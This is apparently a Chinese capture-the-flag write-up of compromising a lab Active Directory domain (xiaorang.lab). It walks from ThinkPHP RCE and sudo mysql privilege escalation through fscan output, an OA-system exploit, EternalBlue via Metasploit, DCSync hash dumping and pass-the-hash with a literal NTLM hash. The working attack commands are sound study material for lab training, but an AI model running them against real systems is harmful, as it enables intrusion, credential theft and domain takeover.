好贵

先扫目录,发现一个robots.txt,但是里面没什么东西

再扫端口

可以发现扫出一个thinkphp5.0.23的rce,工具一键getshell成功

蚁剑连接发现是www-data权限,sudo -l发现可以sudo免密使用mysql命令,就可以去gtfobins上找一句话提权

拿到flag01

蚁剑传一个fscan上去扫一下内网,结果如下

172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.2:88 open
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[+] 172.22.1.21 MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

可以发现172.22.1.21存在ms17010,172.22.1.18是一个信呼协同办公系统,这估计就是剩下两部分flag了

frp+proxyfier做个全局代理先,直接连上

版本是v2.2.8,可以搜到有个后台rce的洞 --> https://blog.csdn.net/solitudi/article/details/118675321 ,弱口令admin:admin123先登录

直接抄抄改改大哥的exp去getshell,还是system权限

flag在C:\Users\Administrator\flag

ms17010那台机器不出网,proxychains4代理msf打一手永恒之蓝

p4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run

然后是DCSync攻击,不是很懂,直接照着打

先拿域内用户的hash值

#msf中
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

再用crackmapexec进行哈希传递

p4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "whoami"
p4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag03.txt"

结束